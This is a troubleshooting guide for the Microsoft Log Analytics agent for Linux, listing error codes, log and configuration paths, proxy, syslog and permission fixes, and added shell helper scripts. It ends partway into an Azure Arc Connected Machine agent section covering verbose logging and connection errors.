suggestion from Support to get the Agent back into an uncorrupted state.
Running the troubleshooter, collecting logs, and attempting a clean re-install will help solve issues
more quickly.
1. Download the purge script:
$ wget https://raw.githubusercontent.com/microsoft/OMS-Agent-for-Linux/master/tools/purge_omsagent.sh
2. Run the purge script (with sudo permissions):
$ sudo sh purge_omsagent.sh

Important log locations and Log Collector tool

File | Path
Log Analytics agent for Linux log file | /var/opt/microsoft/omsagent/<workspace id>/log/omsagent.log
Log Analytics agent configuration log file | /var/opt/microsoft/omsconfig/omsconfig.log

We recommend using the log collector tool to retrieve important logs for troubleshooting
or before submitting a GitHub issue. You can read more about the tool and how to run it here.

Important configuration files

Category | File Location
Syslog | /etc/syslog-ng/syslog-ng.conf or /etc/rsyslog.conf or /etc/rsyslog.d/95-omsagent.conf
Performance, Nagios, Zabbix, Log Analytics output and general agent | /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.conf
Additional configurations | /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.d/*.conf

Important: Edits to the configuration files for performance counters and Syslog are overwritten if the
collection is configured from the Data menu under Log Analytics Advanced Settings in the Azure portal
for your workspace. To disable this configuration for all agents, disable collection from Log
Analytics Advanced Settings; for a single agent, run the following:

sudo su omsagent -c 'python /opt/microsoft/omsconfig/Scripts/OMS_MetaConfigHelper.py --disable'

Installation error codes

Error Code | Meaning
NOT_DEFINED | Because the necessary dependencies are not installed, the auoms auditd plugin will not be installed.
2 | Invalid option provided to the shell bundle. Run sudo sh ./omsagent-*.universal*.sh --help for usage.
3 | No option provided to the shell bundle. Run sudo sh ./omsagent-*.universal*.sh --help for usage.
4 | Invalid package type OR invalid proxy settings; omsagent-rpm.sh packages can only be installed on RPM-based systems, and omsagent-deb.sh packages can only be installed on Debian-based systems. It is recommended that you use the universal installer from the latest release. Also review your proxy settings.
5 | The shell bundle must be executed as root OR a 403 error was returned during onboarding. Run your command using sudo.
6 | Invalid package architecture OR a non-200 HTTP error was returned during onboarding (see onboarding error code 6 below); omsagent-x64.sh packages can only be installed on 64-bit systems, and omsagent-x86.sh packages can only be installed on 32-bit systems. Download the correct package for your architecture from the latest release.
17 | Installation of OMS package failed. Look through the command output for the root failure.
19 | Installation of OMI package failed. Look through the command output for the root failure.
20 | Installation of SCX package failed. Look through the command output for the root failure.
21 | Installation of Provider kits failed. Look through the command output for the root failure.
22 | Installation of bundled package failed. Look through the command output for the root failure.
23 | SCX or OMI package already installed. Use --upgrade instead of --install to install the shell bundle.
30 | Internal bundle error. File a GitHub Issue with details from the output.
55 | Unsupported openssl version OR cannot connect to Azure Monitor OR dpkg is locked OR missing curl program.
61 | Missing Python ctypes library. Install the Python ctypes library or package (python-ctypes).
62 | Missing tar program; install tar.
63 | Missing sed program; install sed.
64 | Missing curl program; install curl.
65 | Missing gpg program; install gpg.

Onboarding error codes

Error Code | Meaning
2 | Invalid option provided to the omsadmin script. Run sudo sh /opt/microsoft/omsagent/bin/omsadmin.sh -h for usage.
3 | Invalid configuration provided to the omsadmin script. Run sudo sh /opt/microsoft/omsagent/bin/omsadmin.sh -h for usage.
4 | Invalid proxy provided to the omsadmin script. Verify the proxy and see the documentation for using an HTTP proxy.
5 | 403 HTTP error received from Azure Monitor. See the full output of the omsadmin script for details.
6 | Non-200 HTTP error received from Azure Monitor. See the full output of the omsadmin script for details.
7 | Unable to connect to Azure Monitor. See the full output of the omsadmin script for details.
8 | Error onboarding to Log Analytics workspace. See the full output of the omsadmin script for details.
30 | Internal script error. File a GitHub Issue with details from the output.
31 | Error generating agent ID. File a GitHub Issue with details from the output.
32 | Error generating certificates. See the full output of the omsadmin script for details.
33 | Error generating metaconfiguration for omsconfig. File a GitHub Issue with details from the output.
34 | Metaconfiguration generation script not present. Retry onboarding with sudo sh /opt/microsoft/omsagent/bin/omsadmin.sh -w <Workspace ID> -s <Workspace Key>.

Enable debug logging

OMS output plugin debug

FluentD allows plugin-specific logging levels, so you can specify different log levels for
inputs and outputs. To specify a different log level for OMS output, edit the general agent
configuration at /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.conf.

In the OMS output plugin, before the end of the configuration file, change
the log_level property from info to debug:

<match oms.** docker.**>
  type out_oms
  log_level debug
  num_threads 5
  buffer_chunk_limit 5m
  buffer_type file
  buffer_path /var/opt/microsoft/omsagent/<workspace id>/state/out_oms*.buffer
  buffer_queue_limit 10
  flush_interval 20s
  retry_limit 10
  retry_wait 30s
</match>

Debug logging allows you to see batched uploads to Azure Monitor separated by type, number
of data items, and time taken to send:

Example debug-enabled log:

Success sending oms.nagios x 1 in 0.14s
Success sending oms.omi x 4 in 0.52s
Success sending oms.syslog.authpriv.info x 1 in 0.91s

Verbose output

Instead of using the OMS output plugin you can also output data items directly to stdout, which
is visible in the Log Analytics agent for Linux log file.

In the Log Analytics general agent configuration file
at /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.conf, comment out the OMS
output plugin by adding a # in front of each line:

#<match oms.** docker.**>
#  type out_oms
#  log_level info
#  num_threads 5
#  buffer_chunk_limit 5m
#  buffer_type file
#  buffer_path /var/opt/microsoft/omsagent/<workspace id>/state/out_oms*.buffer
#  buffer_queue_limit 10
#  flush_interval 20s
#  retry_limit 10
#  retry_wait 30s
#</match>

Below the output plugin, uncomment the following section by removing the # in front of each
line:

<match **>
type stdout
</match>

Issues and Resolutions

Issue: Unable to connect through proxy to Azure Monitor

Probable causes

• The proxy specified during onboarding was incorrect
• The Azure Monitor and Azure Automation service endpoints are not included in
the approved list in your datacenter

Resolution

1. Re-onboard to Azure Monitor with the Log Analytics agent for Linux by using the
following command with the -v option enabled. It allows verbose output of the
agent connecting through the proxy to Azure Monitor:
/opt/microsoft/omsagent/bin/omsadmin.sh -w <Workspace ID> -s <Workspace Key> -p <Proxy Conf> -v
2. Review the section Update proxy settings to verify you have properly configured
the agent to communicate through a proxy server.
3. Double-check that the endpoints outlined in the Azure Monitor network firewall
requirements list are added to an allow list correctly. If you use Azure Automation,
the necessary network configuration steps are linked above as well.

Issue: You receive a 403 error when trying to onboard

Probable causes

• Date and time are incorrect on the Linux server
• Workspace ID and Workspace Key used are not correct

Resolution

1. Check the time on your Linux server with the command date. If the time is +/- 15
minutes from the current time, onboarding fails. To correct this, update the date
and/or timezone of your Linux server.
2. Verify you have installed the latest version of the Log Analytics agent for Linux. The
newest version now notifies you if time skew is causing the onboarding failure.
3. Reonboard using the correct Workspace ID and Workspace Key following the
installation instructions earlier in this article.
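Both causes of the 403 above can be caught before omsadmin.sh is run. The following shell helpers are an added example written for this guide, not part of the Microsoft documentation or of the agent: they check that the workspace ID has the expected GUID shape, measure the local clock against a trusted reference time with the same 15-minute tolerance the service applies, and (for the "not seeing any data" issue later in this section) test for the omsadmin.conf file that marks a completed onboarding. They assume a POSIX sh with GNU coreutils; the reference time is supplied by the caller, and the curl line in the comments is one suggested way to obtain it.

```shell
#!/bin/sh
# Added example (not from the guide or the agent): preflight checks for the
# two onboarding 403 causes above, plus the omsadmin.conf presence check
# used later in this section. Assumes POSIX sh and GNU coreutils (date).

# Skew beyond which the service rejects onboarding with HTTP 403 (+/- 15 minutes).
MAX_SKEW_SECONDS=900

# is_guid <string>
# 0 if <string> has the 8-4-4-4-12 hex shape of a Log Analytics workspace ID,
# 1 otherwise (catches a truncated or mis-pasted ID before the 403 does).
is_guid() {
    printf '%s' "$1" | grep -Eiq '^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$'
}

# clock_skew_seconds <reference_epoch> [local_epoch]
# Prints the absolute difference between a trusted reference time and the
# local clock (default: now). One way to get a reference from an endpoint
# you already allow through the proxy (GNU date):
#   date -d "$(curl -sI https://login.microsoftonline.com | sed -n 's/^[Dd]ate: //p')" +%s
clock_skew_seconds() {
    ref=$1
    now=${2:-$(date +%s)}
    skew=$((now - ref))
    if [ "$skew" -lt 0 ]; then skew=$((0 - skew)); fi
    echo "$skew"
}

# onboarded <workspace_id> [conf_root]
# 0 if omsadmin.conf exists for the workspace, i.e. onboarding completed.
onboarded() {
    root=${2:-/etc/opt/microsoft/omsagent}
    [ -f "$root/$1/conf/omsadmin.conf" ]
}

# check_onboarding_prereqs <workspace_id> <reference_epoch> [local_epoch]
# Returns 0 when onboarding is likely to succeed, 1 for a malformed
# workspace ID, 2 when the clock is outside the tolerated skew.
check_onboarding_prereqs() {
    wsid=$1; ref=$2; now=${3:-$(date +%s)}
    if ! is_guid "$wsid"; then
        echo "workspace ID '$wsid' is not a GUID; re-copy it from the portal" >&2
        return 1
    fi
    skew=$(clock_skew_seconds "$ref" "$now")
    if [ "$skew" -gt "$MAX_SKEW_SECONDS" ]; then
        echo "clock is ${skew}s from the reference; onboarding will return 403." \
             "Fix the date/timezone (or NTP) first" >&2
        return 2
    fi
    return 0
}

# Typical use before onboarding (the workspace key is deliberately not
# handled here; pass it to omsadmin.sh only after these checks pass):
#   check_onboarding_prereqs "$WORKSPACE_ID" "$REFERENCE_EPOCH" \
#     && sudo sh /opt/microsoft/omsagent/bin/omsadmin.sh -w "$WORKSPACE_ID" -s "$WORKSPACE_KEY"
```

The key is kept out of these helpers on purpose: a wrong key also yields a 403, but the only safe test for it is the onboarding call itself, and echoing it for diagnostics would put the workspace key into shell history and logs.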

Issue: You see a 500 and 404 error in the log file right after onboarding

This is a known issue that occurs on first upload of Linux data into a Log Analytics workspace.
It does not affect data being sent or the service experience.

Issue: You see omiagent using 100% CPU

Probable causes

A regression in the nss-pem package v1.0.3-5.el7 caused a severe performance issue that has
been seen frequently on Red Hat/CentOS 7.x distributions. To learn more about this issue,
check the following documentation: Bug 1667121 Performance regression in libcurl.

Performance-related bugs don't happen all the time, and they are very difficult to reproduce. If
you experience such an issue with omiagent, use the script omiHighCPUDiagnostics.sh,
which collects the stack trace of omiagent when it exceeds a given CPU threshold.

1. Download the script:
wget https://raw.githubusercontent.com/microsoft/OMS-Agent-for-Linux/master/tools/LogCollector/source/omiHighCPUDiagnostics.sh
2. Run diagnostics for 24 hours with a 30% CPU threshold:
bash omiHighCPUDiagnostics.sh --runtime-in-min 1440 --cpu-threshold 30
3. The call stack will be dumped in the omiagent_trace file. If you notice many curl and NSS
function calls, follow the resolution steps below.

Resolution (step by step)

1. Upgrade the nss-pem package to v1.0.3-5.el7_6.1:
sudo yum upgrade nss-pem
2. If nss-pem is not available for upgrade (mostly happens on CentOS), then
downgrade curl to 7.29.0-46. If by mistake you run "yum update", curl will be
upgraded to 7.29.0-51 and the issue will happen again:
sudo yum downgrade curl libcurl
3. Restart OMI:
sudo scxadmin -restart

Issue: You are not seeing any data in the Azure portal

Probable causes

• Onboarding to Azure Monitor failed
• Connection to Azure Monitor is blocked
• Log Analytics agent for Linux data is backed up

Resolution

1. Check if onboarding to Azure Monitor was successful by checking if the following file
exists: /etc/opt/microsoft/omsagent/<workspace id>/conf/omsadmin.conf
2. Reonboard using the omsadmin.sh command-line instructions.
3. If using a proxy, refer to the proxy resolution steps provided earlier.
4. In some cases, when the Log Analytics agent for Linux cannot communicate with
the service, data on the agent is queued up to the full buffer size, which is 50 MB. The
agent should be restarted by running the following
command: /opt/microsoft/omsagent/bin/service_control restart [<workspace id>].

Important: This issue is fixed in agent version 1.1.0-28 and later.

Issue: You are not seeing forwarded Syslog messages

Probable causes

• The configuration applied to the Linux server does not allow collection of the sent
facilities and/or log levels
• Syslog is not being forwarded correctly to the Linux server
• The number of messages being forwarded per second is too great for the base
configuration of the Log Analytics agent for Linux to handle

Resolution

• Verify the configuration in the Log Analytics workspace for Syslog has all the
facilities and the correct log levels. Review configure Syslog collection in the Azure
portal.
• Verify the native syslog messaging daemons (rsyslog, syslog-ng) are able to receive
the forwarded messages.
• Check firewall settings on the Syslog server to ensure that messages are not being
blocked.
• Simulate a Syslog message to Log Analytics using the logger command:
logger -p local0.err "This is my test message"

Issue: You are receiving Errno address already in use in the omsagent log file

If you see [error]: unexpected error error_class=Errno::EADDRINUSE
error=#<Errno::EADDRINUSE: Address already in use - bind(2) for "127.0.0.1" port 25224> in
omsagent.log:

Probable causes

This error indicates that the Linux Diagnostic extension (LAD) is installed side by side with the
Log Analytics Linux VM extension, and it is using the same port for syslog data collection as
omsagent.

Resolution

1. As root, execute the following commands (note that 25224 is an example and it is
possible that in your environment you see a different port number used by LAD):

/opt/microsoft/omsagent/bin/configure_syslog.sh configure LAD 25229
sed -i -e 's/25224/25229/' /etc/opt/microsoft/omsagent/LAD/conf/omsagent.d/syslog.conf

You then need to edit the correct rsyslogd or syslog-ng config file and change the
LAD-related configuration to write to port 25229.
2. If the VM is running rsyslogd, the file to be modified is /etc/rsyslog.d/95-omsagent.conf
(if it exists, else /etc/rsyslog.conf). If the VM is running syslog-ng, the file
to be modified is /etc/syslog-ng/syslog-ng.conf.
3. Restart omsagent: sudo /opt/microsoft/omsagent/bin/service_control restart.
4. Restart the syslog service.
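The sed command in step 1 replaces every occurrence of 25224 in the file, and the port you actually need to move has to be read off the error line by hand. The following shell helpers are an added example written for this guide, not part of the Microsoft documentation or of the agent: they extract the clashing port from the EADDRINUSE line in omsagent.log, then rewrite only the port directive of the syslog source and verify the edit took effect. They assume a POSIX sh, GNU sed (for -i) and the one-directive-per-line FluentD syslog source written by configure_syslog.sh; the sample log line and config below are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the guide or the agent): read the clashing port out
# of the EADDRINUSE error and move the LAD syslog listener by editing only the
# "port" directive, instead of the blanket s/25224/25229/ above.
# Assumes POSIX sh, GNU sed (-i) and a one-directive-per-line syslog source.

# conflicting_port <omsagent.log>
# Prints the port from the first Errno::EADDRINUSE line; exit 1 if there is none.
conflicting_port() {
    sed -n 's/.*Errno::EADDRINUSE: Address already in use - bind(2) for "[^"]*" port \([0-9][0-9]*\)>.*/\1/p' "$1" \
        | head -n 1 | grep .
}

# read_syslog_port <syslog.conf>
# Prints the value of the source's port directive (first one found).
read_syslog_port() {
    sed -n 's/^[[:space:]]*port[[:space:]]\{1,\}\([0-9][0-9]*\)[[:space:]]*$/\1/p' "$1" | head -n 1
}

# relocate_syslog_port <syslog.conf> <old_port> <new_port>
# Rewrites "port <old_port>" to "port <new_port>" and re-reads the file to
# confirm. Returns 1 if the source is not on <old_port> (nothing to fix) and
# 2 if the edit did not take effect.
relocate_syslog_port() {
    conf=$1; old=$2; new=$3
    [ "$(read_syslog_port "$conf")" = "$old" ] \
        || { echo "$conf does not listen on port $old" >&2; return 1; }
    sed -i -e "s/^\([[:space:]]*port[[:space:]]\{1,\}\)$old\([[:space:]]*\)$/\1$new\2/" "$conf"
    [ "$(read_syslog_port "$conf")" = "$new" ] || return 2
}

# Typical use on a VM where LAD and omsagent collide (run as root), mirroring
# step 1 above, with the rsyslog/syslog-ng edit and restarts still to follow:
#   port=$(conflicting_port /var/opt/microsoft/omsagent/<workspace id>/log/omsagent.log) \
#     && /opt/microsoft/omsagent/bin/configure_syslog.sh configure LAD 25229 \
#     && relocate_syslog_port /etc/opt/microsoft/omsagent/LAD/conf/omsagent.d/syslog.conf "$port" 25229
```

Anchoring the rewrite to the port directive matters when the old port number also appears elsewhere in the file, for instance inside a comment or as part of a larger number; a global substitution would silently change those too.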

Issue: You are unable to uninstall omsagent using the purge option

Probable causes

• Linux Diagnostic Extension is installed
• Linux Diagnostic Extension was installed and uninstalled, but you still see an error
about omsagent being used by mdsd and it cannot be removed.

Resolution

1. Uninstall the Linux Diagnostic Extension (LAD).
2. Remove Linux Diagnostic Extension files from the machine if they are present in
the following
locations: /var/lib/waagent/Microsoft.Azure.Diagnostics.LinuxDiagnostic-<version>/ and /var/opt/microsoft/omsagent/LAD/.

Issue: You cannot see any Nagios data

Probable causes

• The omsagent user does not have permissions to read from the Nagios log file
• The Nagios source and filter have not been uncommented in the omsagent.conf file

Resolution

1. Add the omsagent user to read from the Nagios file by following these instructions.
2. In the Log Analytics agent for Linux general configuration file
at /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.conf, ensure
that both the Nagios source and filter are uncommented:

<source>
  type tail
  path /var/log/nagios/nagios.log
  format none
  tag oms.nagios
</source>

<filter oms.nagios>
  type filter_nagios_log
</filter>

Issue: You are not seeing any Linux data

Probable causes

• Onboarding to Azure Monitor failed
• Connection to Azure Monitor is blocked
• Virtual machine was rebooted
• OMI package was manually upgraded to a newer version compared to what was
installed by the Log Analytics agent for Linux package
• DSC resource logs a class not found error in the omsconfig.log log file
• Log Analytics agent data is backed up
• DSC logs Current configuration does not exist. Execute Start-DscConfiguration
command with -Path parameter to specify a configuration file and create a current
configuration first. in the omsconfig.log log file, but no log message exists
about PerformRequiredConfigurationChecks operations.

Resolution

1. Install all dependencies, such as the auditd package.
2. Check if onboarding to Azure Monitor was successful by checking if the following
file exists: /etc/opt/microsoft/omsagent/<workspace id>/conf/omsadmin.conf. If it
does not, reonboard using the omsadmin.sh command line instructions.
3. If using a proxy, check the proxy troubleshooting steps above.
4. On some Azure distributions, the omid OMI server daemon does not start after
the virtual machine is rebooted. This will result in not seeing Audit,
ChangeTracking, or UpdateManagement solution-related data. The workaround is
to manually start the OMI server by running sudo /opt/omi/bin/service_control restart.
5. After the OMI package is manually upgraded to a newer version, it has to be manually
restarted for the Log Analytics agent to continue functioning. This step is required for
some distros where the OMI server does not automatically start after it is upgraded.
Run sudo /opt/omi/bin/service_control restart to restart OMI.
6. If you see a DSC resource class not found error in omsconfig.log, run sudo
/opt/omi/bin/service_control restart.
7. In some cases, when the Log Analytics agent for Linux cannot talk to Azure
Monitor, data on the agent is backed up to the full buffer size: 50 MB. The agent
should be restarted by running the following
command: /opt/microsoft/omsagent/bin/service_control restart.

Note

This issue is fixed in Agent version 1.1.0-28 or later.

• If the omsconfig.log log file does not indicate
that PerformRequiredConfigurationChecks operations are running periodically on
the system, there might be a problem with the cron job/service. Make sure the cron
job exists under /etc/cron.d/OMSConsistencyInvoker. If needed, run the following
commands to create the cron job:

mkdir -p /etc/cron.d/
echo "*/15 * * * * omsagent /opt/omi/bin/OMSConsistencyInvoker >/dev/null 2>&1" | sudo tee /etc/cron.d/OMSConsistencyInvoker

Also, make sure the cron service is running. You can use service cron status with
Debian, Ubuntu, SUSE, or service crond status with RHEL, CentOS, Oracle Linux to
check the status of this service. If the service does not exist, you can install the
binaries and start the service using the following:

Ubuntu/Debian

# To install the service binaries
sudo apt-get install -y cron
# To start the service
sudo service cron start

SUSE

# To install the service binaries
sudo zypper in cron -y
# To start the service
sudo systemctl enable cron
sudo systemctl start cron

RHEL/CentOS

# To install the service binaries (the crond daemon ships in the cronie package)
sudo yum install -y cronie
# To start the service
sudo service crond start

Oracle Linux

# To install the service binaries
sudo yum install -y cronie
# To start the service
sudo service crond start

Issue: When configuring collection from the portal for Syslog or Linux performance
counters, the settings are not applied

Probable causes

• The Log Analytics agent for Linux has not picked up the latest configuration
• The changed settings in the portal were not applied

Resolution

Background: omsconfig is the Log Analytics agent for Linux configuration agent that looks for
new portal-side configuration every five minutes. This configuration is then applied to the Log
Analytics agent for Linux configuration files located at
/etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.conf.
• In some cases, the Log Analytics agent for Linux configuration agent might not be able
to communicate with the portal configuration service, resulting in the latest configuration not
being applied.
1. Check that the omsconfig agent is installed by running dpkg --list omsconfig or rpm -qi
omsconfig. If it is not installed, reinstall the latest version of the Log Analytics agent for
Linux.
2. Check that the omsconfig agent can communicate with Azure Monitor by running the
following command:
sudo su omsagent -c 'python /opt/microsoft/omsconfig/Scripts/GetDscConfiguration.py'
This command returns the configuration that the agent receives from the service, including Syslog
settings, Linux performance counters, and custom logs. If this command fails, run the following
command:
sudo su omsagent -c 'python /opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py'
This command forces the omsconfig agent to talk to Azure Monitor and retrieve the latest
configuration.

Issue: You are not seeing any custom log data

Probable causes

• Onboarding to Azure Monitor failed.
• The setting Apply the following configuration to my Linux Servers has not been
selected.
• omsconfig has not picked up the latest custom log configuration from the service.
• The Log Analytics agent for Linux user omsagent is unable to access the custom log due to
permissions or the file not being found. You may see the following errors:
  [DATETIME] [warn]: file not found. Continuing without tailing it.
  [DATETIME] [error]: file not accessible by omsagent.
• Known issue with a race condition, fixed in Log Analytics agent for Linux version
1.1.0-217

Resolution

1. Verify onboarding to Azure Monitor was successful by checking if the following file
exists: /etc/opt/microsoft/omsagent/<workspace id>/conf/omsadmin.conf. If it does not,
reonboard using the omsadmin.sh command line instructions.
2. Under Advanced Settings in the Azure portal, ensure that the setting Apply the following
configuration to my Linux Servers is enabled.
3. Check that the omsconfig agent can communicate with Azure Monitor by running the
following command:
sudo su omsagent -c 'python /opt/microsoft/omsconfig/Scripts/GetDscConfiguration.py'
This command returns the configuration that the agent receives from the service, including Syslog
settings, Linux performance counters, and custom logs. If this command fails, run the following
command:
sudo su omsagent -c 'python /opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py'
This command forces the omsconfig agent to talk to Azure Monitor and retrieve the latest
configuration.

Background: Instead of the Log Analytics agent for Linux running as a privileged user (root), the
agent runs as the omsagent user. In most cases, explicit permission must be granted to this user
in order for certain files to be read. To grant permission to the omsagent user, run the following
commands:
1. Add the omsagent user to the group that owns the log: sudo usermod -a -G <GROUPNAME> omsagent
2. Grant read access to the required files: sudo chmod -R ugo+rx <FILE DIRECTORY>

Note that ugo+rx makes the whole directory tree readable by every local account, not only by
omsagent. If the custom log can contain sensitive data, grant read access to the owning group
only (g+rX) after step 1 rather than to everyone.
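The following shell helpers are an added example written for this guide, not part of the Microsoft documentation or of the agent: they implement the group-based alternative to chmod -R ugo+rx, giving the group that omsagent has been added to read (and, for directories, traverse) access while explicitly removing access for everyone else, and they check the result the way the omsagent user would experience it. They assume a POSIX sh with GNU coreutils (stat -c) and that the usermod step above has already been done as root; the directory and file used in the test are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the guide or the agent): give the omsagent user read
# access to a custom log tree through its group instead of the world-readable
# chmod -R ugo+rx above. Assumes POSIX sh and GNU coreutils (stat -c).
# Group membership (step 1 above) still needs root:
#   sudo usermod -a -G <GROUPNAME> omsagent

# grant_group_read <dir> <group>
# Makes <dir> and everything under it owned by <group>, readable by the group
# (directories also traversable via X, which leaves plain files non-executable),
# and closed to "others".
grant_group_read() {
    dir=$1; grp=$2
    [ -d "$dir" ] || { echo "$dir is not a directory" >&2; return 1; }
    chgrp -R "$grp" "$dir" && chmod -R g+rX,o-rwx "$dir"
}

# mode_of <path>: octal permission bits, e.g. 640.
mode_of() { stat -c %a "$1"; }

# readable_by_group <path> <group>
# 0 if <group> owns <path> and the group read bit is set, 1 otherwise.
# This is the access the omsagent user gets once it is a member of <group>.
readable_by_group() {
    [ "$(stat -c %G "$1")" = "$2" ] || return 1
    case $(stat -c %A "$1") in      # e.g. -rw-r-----: position 5 is group read
        ????r*) return 0 ;;
        *)      return 1 ;;
    esac
}

# world_readable <path>
# 0 if "others" can read <path>, which is the over-grant ugo+rx produces.
world_readable() {
    case $(stat -c %A "$1") in      # position 8 is the "other" read bit
        ???????r*) return 0 ;;
        *)         return 1 ;;
    esac
}

# Typical use (as root) for an application log directory owned by group appsvc:
#   usermod -a -G appsvc omsagent && grant_group_read /var/log/myapp appsvc
#   readable_by_group /var/log/myapp/app.log appsvc && echo "omsagent can tail it"
```

After changing group membership, restart the agent (sudo /opt/microsoft/omsagent/bin/service_control restart) so the omsagent process picks up its new supplementary group; a running process keeps the group list it started with.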

There is a known issue with a race condition in Log Analytics agent for Linux versions
earlier than 1.1.0-217. After updating to the latest agent, run the following command to get the
latest version of the output plugin:
sudo cp /etc/opt/microsoft/omsagent/sysconf/omsagent.conf /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.conf

Issue: You are trying to reonboard to a new workspace

When you try to reonboard an agent to a new workspace, the Log Analytics agent configuration
needs to be cleaned up before reonboarding. To clean up old configuration from the agent, run
the shell bundle with --purge:

sudo sh ./omsagent-*.universal.x64.sh --purge

Or

sudo sh ./onboard_agent.sh --purge

You can continue to reonboard after using the --purge option.


Issue: Log Analytics agent extension in the Azure portal is marked with a failed state:
Provisioning failed

Probable causes

• Log Analytics agent has been removed from the operating system
• Log Analytics agent service is down, disabled, or not configured

Resolution

Perform the following steps to correct the issue.

1. Remove the extension from the Azure portal.
2. Install the agent following the instructions.
3. Restart the agent by running the following command: sudo
/opt/microsoft/omsagent/bin/service_control restart.
4. Wait several minutes and the provisioning state changes to Provisioning
succeeded.

Issue: The Log Analytics agent upgrade on-demand

Probable causes

The Log Analytics agent packages on the host are outdated.

Resolution

Perform the following steps to correct the issue.

1. Check for the latest release on the releases page.
2. Download the install script (1.4.2-124 as example version):

wget https://github.com/Microsoft/OMS-Agent-for-Linux/releases/download/OMSAgent_GA_v1.4.2-124/omsagent-1.4.2-124.universal.x64.sh

3. Upgrade packages by executing sudo sh ./omsagent-*.universal.x64.sh --upgrade.

16.3 Azure Arc

This section covers troubleshooting and resolving issues that may occur while attempting to
configure the Azure Arc enabled servers Connected Machine agent for Windows or Linux. Both
the interactive and at-scale installation methods for configuring the connection to the service are
included.

Agent verbose logging

Before following the troubleshooting steps described later in this article, the minimum
information you need is the verbose log. It contains the output of the azcmagent tool
commands when the verbose (-v) argument is used. The log files are written
to %ProgramData%\AzureConnectedMachineAgent\Log\azcmagent.log on Windows, and
to /var/opt/azcmagent/log/azcmagent.log on Linux.

Windows

The following is an example of the command to enable verbose logging with the Connected
Machine agent for Windows when performing an interactive installation.

& "$env:ProgramFiles\AzureConnectedMachineAgent\azcmagent.exe" connect --resource-grou


p "resourceGroupName" --tenant-id "tenantID" --location "regionName" --subscription-id "subs
criptionID" --verbose

The following is an example of the command to enable verbose logging with the Connected
Machine agent for Windows when performing an at-scale installation using a service principal.

& "$env:ProgramFiles\AzureConnectedMachineAgent\azcmagent.exe" connect `


--service-principal-id "{serviceprincipalAppID}" `

--service-principal-secret "{serviceprincipalPassword}" `
--resource-group "{ResourceGroupName}" `

--tenant-id "{tenantID}" `
--location "{resourceLocation}" `

--subscription-id "{subscriptionID}"

--verbose

Linux

The following is an example of the command to enable verbose logging with the Connected
Machine agent for Linux when performing an interactive installation.
Note
Page 238
Security: Azure Security Center – Fundamentals
"SecASC_Tactical Scenarios Guide"
You must have root access permissions on Linux machines to run azcmagent.
Bash

azcmagent connect --resource-group "resourceGroupName" --tenant-id "tenantID" --location "r


egionName" --subscription-id "subscriptionID" --verbose

The following is an example of the command to enable verbose logging with the Connected
Machine agent for Linux when performing an at-scale installation using a service principal.
Bash

azcmagent connect \

--service-principal-id "{serviceprincipalAppID}" \
--service-principal-secret "{serviceprincipalPassword}" \

--resource-group "{ResourceGroupName}" \

--tenant-id "{tenantID}" \
--location "{resourceLocation}" \

--subscription-id "{subscriptionID}"

--verbose

Agent connection issues to service

The following table lists some of the known errors and suggestions on how to troubleshoot and
resolve them.

Message: Failed to acquire authorization token device flow
Error: Error occurred while sending request for Device Authorization Code: Post https://login.windows.net/fb84ce97-b875-4d12-b031-ef5e7edf9c8e/oauth2/devicecode?api-version=1.0: dial tcp 40.126.9.7:443: connect: network is unreachable.
Probable cause: Cannot reach login.windows.net endpoint.
Solution: Verify connectivity to the endpoint.

Message: Failed to acquire authorization token device flow
Error: Error occurred while sending request for Device Authorization Code: Post https://login.windows.net/fb84ce97-b875-4d12-b031-ef5e7edf9c8e/oauth2/devicecode?api-version=1.0: dial tcp 40.126.9.7:443: connect: network is Forbidden.
Probable cause: Proxy or firewall is blocking access to login.windows.net endpoint.
Solution: Verify connectivity to the endpoint and that it is not blocked by a firewall or proxy server.

Message: Failed to acquire authorization token device flow
Error: Error occurred while sending request for Device Authorization Code: Post https://login.windows.net/fb84ce97-b875-4d12-b031-ef5e7edf9c8e/oauth2/devicecode?api-version=1.0: dial tcp lookup login.windows.net: no such host.
Probable cause: Group Policy Object Computer Configuration\Administrative Templates\System\User Profiles\Delete user profiles older than a specified number of days on system restart is enabled.
Solution: Verify the GPO is enabled and targeting the affected machine. See footnote 1 for further details.

Message: Failed to acquire authorization token from SPN
Error: Failed to execute the refresh request. Error = 'Post https://login.windows.net/fb84ce97-b875-4d12-b031-ef5e7edf9c8e/oauth2/token?api-version=1.0: Forbidden'
Probable cause: Proxy or firewall is blocking access to login.windows.net endpoint.
Solution: Verify connectivity to the endpoint and that it is not blocked by a firewall or proxy server.

Message: Failed to acquire authorization token from SPN
Error: Invalid client secret is provided
Probable cause: Wrong or invalid service principal secret.
Solution: Verify the service principal secret.

Message: Failed to acquire authorization token from SPN
Error: Application with identifier 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx' was not found in the directory 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx'. This can happen if the application has not been installed by the administrator of the tenant or consented to by any user in the tenant
Probable cause: Incorrect service principal and/or tenant ID.
Solution: Verify the service principal and/or the tenant ID.

Message: Get ARM Resource Response
Error: The client 'username@domain.com' with object id 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx' does not have authorization to perform action 'Microsoft.HybridCompute/machines/read' over scope '/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourcegroups/myResourceGroup/providers/Microsoft.HybridCompute/machines/MSJC01' or the scope is invalid. If access was recently granted, please refresh your credentials."}}" Status Code=403
Probable cause: Wrong credentials and/or permissions.
Solution: Verify you or the service principal is a member of the Azure Connected Machine Onboarding role.

Message: Failed to AzcmagentConnect ARM resource
Error: The subscription is not registered to use namespace 'Microsoft.HybridCompute'
Probable cause: Azure resource providers are not registered.
Solution: Register the resource providers.

Message: Failed to AzcmagentConnect ARM resource
